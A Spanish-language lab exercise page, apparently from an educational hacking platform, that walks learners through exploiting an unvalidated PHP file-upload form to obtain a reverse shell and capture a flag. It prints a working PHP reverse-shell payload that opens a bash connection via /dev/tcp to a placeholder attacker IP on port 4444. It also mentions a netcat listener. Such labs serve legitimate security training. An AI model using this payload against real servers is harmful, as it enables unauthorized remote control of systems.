Dificultad
intermediate
Duración promedio
2 hrs
En este laboratorio pondrás en práctica el uso de una shell inversa para tomar control remoto de un servidor vulnerable. Tu misión es identificar un formulario mal protegido, subir un archivo malicioso y capturar una flag alojada en el sistema. En este laboratorio aprenderás:
netcat
Sigue las siguientes instrucciones para comenzar:
El servidor aloja un sitio web desarrollado en PHP, accesible por navegador que tiene un formulario que no valida el tipo de archivo que se sube y es tu responsabilidad preparar una reverse shell funcional y lograr que el servidor se conecte de vuelta a tu máquina.
Explorar el sitio web vulnerable: Accede a la IP de la máquina desde tu navegador y ubica el formulario de subida de archivos.
Prepara tu reverse shell en PHP: Crea un archivo llamado shell.php
con este contenido:
1<?php 2exec("/bin/bash -c 'bash -i >& /dev/tcp/TU_IP/4444 0>&1'"); 3?>
TU_IP
por la IP de tu máquina atacante.Levantar un listener en tu máquina
Subir la reverse shell al servidor
Recuerda: estás en un entorno controlado para fines educativos. El conocimiento ético es tu mejor herramienta. Observa, explora y aprende a identificar configuraciones inseguras.
¡Feliz hackeo!
Dificultad
intermediate
Duración promedio
2 hrs